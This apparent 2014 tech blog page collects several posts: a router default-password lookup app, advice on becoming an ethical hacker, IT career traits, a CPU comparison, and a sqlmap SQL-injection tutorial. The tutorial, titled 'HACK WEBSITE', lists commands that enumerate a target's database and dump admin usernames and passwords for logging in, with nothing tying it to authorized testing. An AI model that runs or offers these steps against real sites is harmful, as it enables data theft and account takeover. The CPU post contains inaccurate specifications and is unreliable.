Saturday 2 August 2014

Router passwords Finder App

Description
Router Passwords Finder app provides quick
access for technicians to default passwords
used on routers, default web logins, CCTV
systems and other electronic devices.
Using this app, you can:
- Browse large database of router
manufacturers.
- Search for router manufacturers.
- See list of all models of router
manufacturers.
- Copy information, share, add to bookmark
model.
https://play.google.com/store/apps/details?
id=com.viddic.routerpasswords
Alternative Websites
http://www.routerpasswords .com
http://portforward. com/default_username
_password/

Router passwords Finder App

Description
Router Passwords Finder app provides quick
access for technicians to default passwords
used on routers, default web logins, CCTV
systems and other electronic devices.
Using this app, you can:
- Browse large database of router
manufacturers.
- Search for router manufacturers.
- See list of all models of router
manufacturers.
- Copy information, share, add to bookmark
model.
https://play.google.com/store/apps/details?
id=com.viddic.routerpasswords
Alternative Websites
http://www.routerpasswords .com
http://portforward. com/default_username
_password/

How to become an ethical hacker

An essential guide to
becoming an ethical hacker
I often get a number of people ask for
guidance about how they can become an
ethical hacker. I also receive even more
requests about how to become a black hat
hacker. The latter requests are ignored. below
is a definition of an ethical hacker
Ethical hacker
noun
1. a person who hacks into a computer
network in order to test or evaluate its
security, rather than with malicious or
criminal intent.
So if you want to be an ethical hacker the
truth is there is no easy method to become a
skilled hacker …… it’s easy to be a script kiddie
and load up Armitage or Fast-track and fire
every exploit known to man at a target. But
what’s the point at firing Linux exploits at a
Windows box!.
You need essential prerequisite knowledge
If you want to get into the IT  security world
as a white hat you must be competent in the
following areas:
Networking
Programming
Databases
Once you have a fairly good knowledge of the
above points THEN it would a good idea to
learn about hacking. So now you have a good
understanding of the fundamentals of IT, you
can now understand how to break some of the
underlying vulnerabilities within computer
architecture. The following activities should
help you with this:
Read books about hacking (Here are some
good examples of some) -
Hacking: The Art of Exploitation, 2nd
Edition
The Basics of Hacking and Penetration
Testing: Ethical Hacking and Penetration
Testing Made Easy (Syngress Basics Series)
Metasploit: The Penetration Tester’s Guide
BackTrack 5 Wireless Penetration Testing
Beginner’s Guide
CEH Certified Ethical Hacker All-in-One
Exam Guide
Google Hacking for Penetration Testers
The Web Application Hacker’s Handbook:
Finding and Exploiting Security Flaws
Undertake various online courses
CEH
OSCP
SANS SEC560
Communicate and follow other fellow IT
security enthusiasts through the following
mediums
Facebook (https://www.facebook.com/
pages/Hacking-News-
Tutorials/252350961471136 )
Google+
Twitter
Self learn by reading and watching online
tutorials
www.video.latesthackingnews.com
www.securitytube.net
youtube.com
Download practice environments to practice
and hone newly learned skills
DVWA (Dam Vulnerable Web Application)
Metasploitable
Samurai WTF
Final note: Hacking is something that takes A
LOT of your time!, be prepared to sacrifice
friendships, relationships and that awesome
social life you used to have!

Characteristics of an effective IT professional

Patience, patience and more patience - IT
can be stressful, fun, challenging and a
whole lot of other things! Having an
overflowing supply of patience – with users,
with other techs, with software, with
hardware, with vendors, with bosses and
with self is of major value!
Ability to adapt quickly to change is another
ingredient that I believe is essential. IT
needs, tools and equipment is constantly
changing – and keeping up with it can be a
challenge. Those that can adapt quickly shrug
off the discarded work of the past in favor of
attacking the new, without seeing the past
work as being futile or a “waste” of time.
A positive outlook is a must have for an
effective IT professional. Change and “issues”
of all kinds crop up daily in the IT world – so
having a positive attitude brings about
stability in self and the environment – things
are just better.
The effective IT professional is not a 9 to 5
person - IT functions often require that work
be done “off” hours. The most miserable IT
person I ever worked with really just wanted
a job to go to between 9 -5. Needless to say,
he didn't work out!
A love for challenge rounds out my top 5
characteristics of an effective IT person. IT is
NOT easy street — it is NOT narrowly defined
— it can be multi-disciplined, requiring
knowledge way beyond the technical. IT is
NOT for everyone — good thing — if it was,
everyone would be doing it whether they
posses these characteristics or not!

Friday 1 August 2014

DIFFERENCE BETWEEN CORE I3, CORE i5, CORE I7.

► Core i3:
* Entry level processor.
* 2-4 Cores
* 4 Threads
* Hyper-Threading (efficient use of
processor resources)
* 3-4 MB Cache
* 32 nm Silicon (less heat and energy)
► Core i5:
* Mid range processor.
* 2-4 Cores
* 4 Threads
* Turbo Mode (turn off core if not used)
* Hyper-Threading (efficient use of
processor resources)
* 3-8 MB Cache
* 32-45 nm Silicon (less heat and energy)
► Core i7:
* High end processor.
* 4 Cores
* 8 Threads
* Turbo Mode (turn off core if not used)
* Hyper-Threading (efficient use of
processor resources)
* 4-8 MB Cache
* 32-45 nm Silicon (less heat and energy)

Wednesday 30 July 2014

HACK WEBSITE USING SQLMAP SQL INJECTION TOOLS FULL TUTORIAL

how to use sqlmap on GET method
- fingerprinting
first you must have a vulnerable website for
the target, if you was have a target now open
sqlmap and type this command
./sqlmap.py -u "http://www.target.com/
index.php?id=2 "
sqlmap will detect vulnerable of your target
and will tell you what the type of vulnerable
and what is the database type. and if your
target vulnerable go to next step.
- find database name
type this command to find database name
./sqlmap.py -u "http://www.target.com/
index.php?id=2 " --dbs
on this step, sqlmap will find the database
name of your target, for example I use
"web_db" for the database name.
- find tables name
after sqlmap find the databse name its time
to find the tables name. use this command to
find the table name
./sqlmap.py -u "http://www.target.com/
index.php?id=2 " -D web_db --tables
there will show you some tables name inside
"web_db" database, ok for example I use
"tbl_admin" as the tables name.
- find columns name
its time to find what inside "tbl_admin" from
"web_db" and we call it columns. to find
columns type this command
./sqlmap.py -u "http://www.target.com/
index.php?id=2 " -D web_db -T tbl_admin --
columns
it will show you the list of columns name,
for example I find "user" and "password"
columns.
- dump
this command will dumped data from the
columns, type this command
./sqlmap.py -u "http://www.target.com/
index.php?id=2 " -D web_db -T tbl_admin -C
user,password --dump
and I find "user = admin" and "password =
adminpass". now go to the web and find the
admin login.
how to use sqlmap on POST method
its the same way with GET method, its just
that you have to insert POST data to the
sqlmap. for example I have vulnerable site
on the "login.php" path. the POST data is
"id=admin&pwd=password&submit=login".
how to find the POST data ? just use "Live
HTTPheaders" its a firefox add ons.
- fingerprinting
its same way with GET method, just type this
command
./sqlmap.py -u "http://www.target.com/
login.php " --
data="id=admin&pwd=password&submit=login"
- find database name
./sqlmap.py -u "http://www.target.com/
login.php " --
data="id=admin&pwd=password&submit=login"
--dbs
- find tables name
./sqlmap.py -u "http://www.target.com/
login.php " --
data="id=admin&pwd=password&submit=login"
-D web_db --tables
- find columns name
./sqlmap.py -u "http://www.target.com/
login.php " --
data="id=admin&pwd=password&submit=login"
-D web_db -T tbl_admin --columns
- dump
./sqlmap.py -u "http://www.target.com/
login.php " --
data="id=admin&pwd=password&submit=login"
-D web_db -T tbl_admin -C user,password --
dump
include cookie
still same method but you just should insert
the cookie
./sqlmap.py -u "http://www.target.com/
index.php?id=2 " --
cookie="PHPSESSID=123asdqwe456blabla;user=admin"
or
./sqlmap.py -u "http://www.target.com/
login.php " --
data="id=admin&pwd=password&submit=login"
--
cookie="PHPSESSID=123asdqwe456blabla;user=admin"
custom parameter
if you have a custom parameter to inject you
can type "-p" like this command
./sqlmap.py -u "http://www.target.com/
login.php " --
data="id=admin&pwd=password&submit=login"
--
cookie="PHPSESSID=123asdqwe456blabla;user=admin"
-p "pwd"
sqlmap will inject "pwd" parameter. or you
can give star"*" to the parameter to inject,
like this
./sqlmap.py -u "http://www.target.com/
login.php " --
data="id=admin&pwd=*password&submit=login"
--
cookie="PHPSESSID=123asdqwe456blabla;user=admin"
cover
if you a windows users, dont use "./" to run
it on cmd.
Go To Download Software: http://sqlmap.org/
--from PH1K3!